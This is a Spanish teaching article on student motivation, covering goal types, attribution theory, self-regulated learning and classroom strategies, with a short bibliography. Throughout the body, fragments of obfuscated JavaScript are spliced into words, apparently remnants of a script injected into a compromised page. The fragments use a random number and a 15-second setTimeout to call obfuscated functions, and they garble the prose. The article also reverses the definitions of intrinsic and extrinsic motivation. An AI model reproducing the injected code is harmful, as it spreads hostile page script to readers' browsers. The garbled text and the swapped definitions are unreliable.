¿CÓMO MOTIVAR AL ALUMNADO? TIPOS DE MOTIVACIÓN Y DIFERENTES METAS DE APRENDIZAJE.

Autora: Mª Teresa Vivas Martín

Un buen docente debe saber cómo motivar al alumnado para conseguir una buena calidad de enseñanza y aprendizaje. Existen diferentes tipos de motivación que nos llevan a plantearnos diferentes metas a lo largo de nuestra “aventura” como docentes o estudiantes. El uso de las nuevas tecnologías es una buena forma de mantener la atención y motivación del alumnado y así fomentar un aprendizaje autorregulado sin olvidar una evaluación continuada del mismo.

El proceso de enseñanza-aprendizaje es lo que desarrollamos, nosotros los docentes, en el centro educativo, pero como bien saben ustedes para que este proceso funcione los padres y por supuesto los alumnos deben poner de su parte y proponer sus propias metas de aprendizaje, es decir sus propios objetivos. Pero antes de hablar de las metas me gustaría hablar sobre motivación. ¿Qué es para ustedes la motivación? Motivación es lo que necesita toda persona para que la realización de su trabajo sea lo más fructífera posible. Según el informe PISA y cito textualmente: “el éxito del sistema educativo está en lograr una mayor motivación en el alumnado. El estudiante debe aprender que lo que estudia no sólo sirve para la escuela, sino que le abrirá nuevas oportunidades en el futuro”. Pero diferenciemos dos tipos de motivación: intrínseca: hacemos las cosas para aprobar o para lograr algo y extrínseca es cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando hacemos algo porque queremos y nos gusta. Por ejemplo motivación intrínseca es cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando leemos un libro porque nos lo han mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andado en clase pero si leemos un libro porque queremos en nuestro tiempo libre es motivación extrínseca. El problema está en que es muy difícil, o al menos a simple vista, incrementar la motivación en ciertos estudiantes. Relacionado con la motivación están las metas que uno mismo se plantea pero según la cantidad de motivación que tengamos así plantearemos nuestras  metas. Existen diferentes metas:

  1. De dominio o aprendizaje: mejor y aprender
  2. De desempeño: verse bien uno mismo demostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando tus habilidades a lo demás
  3. De metas sociales

El docente utiliza el método de la retroalimentación para que el establecimiento de las metas en el aula resulte eficaz y otro método es saber aceptar las metas de cada uno como propias del ser y que no se vean afectados por las de los demás.

Para que todo esto funcione de una manera adecuada  debemos mejorar la autoestima de los estudiantes para hacerles crecer su motivación y así lograr las metas establecidas. Por ello debemos saber qué piensan ellos acerca del “yo”

Debemos lograr que nuestros alumnos estudien de manera autónoma y no obligados y debemos hacer saber que el estudio es algo útil para nuestro futuro y no algo que hay que hacerlo para solo aprobar, debemos hacer que nuestra enseñanza se entienda como algo útil, ya que ver los contenidos como algo que no sirve hace que la motivación disminuya. Debemos relacionar lo que enseñamos con el mundo real pero algo muy importante para los docentes es no solo enseñar contenidos sino también saber cómo enseñarlos, debemos no aburrir a los alumnos, utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando temas de interés en nuestras aulas como las nuevas tecnologías.

La motivación puede ser tratada desde puntos de vista diferentes por ejemplo desde el conductismo, a través de la conducta y desde el cognitivismo teoría que se basa en la mente del individuo.

Según la teoría de la atribución, nuestra motivación se ve afectada por las explicaciones y las causas que  nos formulemos sobre uno mismo, sobre los éxitos y fracasos y se caracterizan por: el locus o ubicación de la causa, su estabilidad y  si el individuo es capaz de controlarla.

Las atribuciones se dan en la clase como por ejemplo decir que han suspendido un examen porque el profesor no ha explicado bien la materia la materia o viceversa.

Como vemos todo lo estamos basandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en la motivación que es el principal objetivo a alcanzar en los estudiantes.

Algo que debemos también señalar, es que le estudiante está en continuo cambio ya que la sociedad está continuamente cambiandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, y esto dificulta el proceso de enseñanza-aprendizaje, antes el papel protagonista en el centro era el profesor y la enseñanza de este pero ahora es el alumno y su aprendizaje lo más importante. algo que también afecta a la motivación es las creencias que uno mismo se formule, podemos tener la creencia de tener la habilidad para alcanzar la metas que nos proponemos pero también debemos creer en la autoeficacia, en nuestro autoconcepto y autoestima para lograr una mayor motivación. Pero no solo el alumno debe confiar en su autoeficacia sino que el profesor debe creer que él será capaz de logara que el alumno consiga los objetivos propuestos no solo porque este se esfuerce sino porque el profesor se preocupe por ello. Por ello debemos crear aulas autodeterminantes donde el alumno  sienta más interés, además de decisión y control de sus hechos.

El aprendizaje de hoy en día se caracteriza por: activo, cognitivo, constructivo, significativo, mediado y autorregulado, por ello la educación debe ayudar al alumno a conseguir metas valiosas. Los docentes debemos fomentar en nuestros alumnos el aprendizaje autorregulado ya que estos participan activamente en el aprendizaje metacognitivo, motivacional y comportamental, es decir saben utilizar sus propias estrategias para alcanzar el aprendizaje deseado y están automotivados. Este aprendizaje tiene diferentes etapas que se resumen, según Pintrich (2000) sicólogo educativo en: la planificación; la autoobservación (self-monitoring); el control; y la evaluación, pero estas características no tienen un orden sino que se pueden dar en diferente orden.

Esta idea la podemos resumir en que un alumno que desarrolla un aprendizaje autorregulado, es capaz de cambiar el contexto y modificarlo por ello es tan importante la idea de aprendizaje autorregulado. Como hemos dicho anteriormente, el alumno se va a plantear unas metas y relacionado con el aprendizaje autorregulado se pueden dar metas de aprendizaje y de rendimiento. Las metas de aprendizaje, se caracterizan por la utilización de metas cognitivas, mayor esfuerzo y una motivación más adaptada a uno mismo, mientras que las metas de rendimiento están más alejadas del aprendizaje autorregulado y de la motivación. Todo lo que forme parte del centro educativo debe ser evaluado como un método de mejora, por ello el aprendizaje autorregulado se debe evaluar con las siguientes herramientas: aptitud del alumno que podemos medir a través de cuestionarios de autoinforme o entrevistas; y actividad mediante detección de errores en las tareas o El think-aloud (pensar en voz alta) entre otros. Pero la pregunta es ¿cómo enseñar al un alumno el aprendizaje autorregulado? Existen diferentes métodos:

  1. Enseñanza directa de estrategias
  2. Modelado: hacer que se basen en un modelo para alcanzar el aprendizaje deseado.
  3. Práctica guiada y luego independiente y feedback por parte de los demás.
  4. Autoobservación
  5. Apoyo social
  6. Práctica autorreflexiva (o discusión metacognitiva)

Es obvio que existen diferentes estrategias para lograr una mayor motivación por parte del alumno, y se pueden resumir en:

  1. Adaptar el trabajo al nivel del grupo
  2. Crear metas de aprendizaje claras y alcanzables
  3. Señalar a los estudiantes lo que hacen mal y bien y explicarlo, saber elogiarlos.
  4. Las habilidades académicas se pueden mejorar y que son propias de cada área
  5. Crear soluciones a los problemas
  6. Ayudarles a centrarse en la tarea
  7. Hacer de la tarea de aprendizaje algo divertido
  8. Relacionar las actividades de clase con sus intereses

La idea de adaptar el trabajo al nivel del grupo podemos decir que es algo muy complicado ya que debemos saber que hay tareas que serán difíciles para unos y fáciles para otros por lo que debemos adaptarlas de manera que los alumnos no se acomoden a dicho aprendizaje sino que se esfuercen y se preocupen por este.

Los profesores al mismo tiempo debemos preparar al alumno para que entienda el fracaso como algo constructivo y como algo normal en el proceso de enseñanza-aprendizaje. El docente debe despertar la motivación intrínseca en el alumnado haciendo por ejemplo preguntas novedosas de temas de actualidad que despierten el interés por el aprendizaje. El profesor debe mostrarse entusiasmado por su tarea para transmitir tal entusiasmo a sus alumnos, debemos explicar el porqué estamos estudiandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando dicha materia y verla como algo útil en el día a día. El profesor debe enlazar las sesiones para que alumno no se sienta perdido y formular gran variedad de ejemplos. Por otro lado es muy importante que el profesor sea capaz de resolver todas las dudas que el alumno le platee para que no pierdan el interés por la asignatura porque no la entienden.

Algo muy importante también es que el alumno debe sentirse escuchado de forma activa por el docente ya que de lo contrario puede llegar a pensar que lo más importante para el docente es la explicación de los contenidos y no dar respuesta a las necesidades que se originan en el aula. El alumno debe sentirse integrado dentro del aula y recibir refuerzo positivo hacia las preguntas que haga en clase para hacer crecer su interés por la asignatura y su motivación. Los mensaje s que produce el profesor se hacen antes de las tareas ayudan a la elaboración de la actividad; durante la actividad facilitan la planificación de la actividad y finalmente las de después de la tarea ayudan a aprender de los fracasos y de los errores si los hubiese. Pero también el profesor debe saber que también puede cometer errores y que la manera en que se comporte tras un error es muy importante para los alumnos ya que esto influye en la valoración de sus trabajos.

Resumamos pues los diferentes tipos de trabajo que se dan en al aula. En primer lugar tenemos el trabajo individual que es utilizado cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la tarea se centra en la práctica y consolidación de destrezas; trabajo competitivo solo motiva a los más capaces y  lo que debemos tratar es de hacer que todos progresen en la medida de sus posibilidades; trabajo cooperativo mediante la tutoría, coordinación cooperativa o trabajos en grupo y colaboración cooperativa.

Por último está el tema de la evaluación de los contenidos que también afecta  ala motivación de los alumnos ya que si se suspende mucho puedes llegar a desmotivarte. Algo que debemos entender es que el hecho de suspender un examen no explica que no se sepan los contenidos ya que depende de la forma de evaluar y de lo que se evalúe. Por ello debemos intentar una evaluación continua y que el alumno se esfuerce durante todo el proceso de aprendizaje y no solo para el examen final donde va a memorizar los contenidos y al día siguiente no recordará nada. El propio alumno siente que lo que está haciendo no vale para nada y encima se lo juega todo a un examen.

Como conclusión creo que lo más importante es saber que saber motivar a un alumno es lo más importante que se puede hacer dentro del aula y hay que pensar que no solo somos robots que explican contenidos sino que somos aquellos que ayudan a guiar el aprendizaje para logara las meas propuestas por el alumno.

Biblografía.

Beltrán, J. (1998). Claves psicológicas para la motivación y el rendimiento académico. En M. Acosta (Coord.), Creatividad, motivación y rendimiento

académico (pp.39-54). Málaga: Aljibe.

Woolfolk, A. (2006). Psicología Educativa. Motivación en el aprendizaje y la enseñanza (cap.10, págs. 351-352). Madrid: Alianza.

Alonso-Tapia (1999). Psicología de la instrucción: la enseñanza y el aprendizaje en la Educación Secundaria. Motivación y aprendizaje en la Enseñanza Secundaria (cap. 4, 107-113). Universidad Barcelona: ICE.

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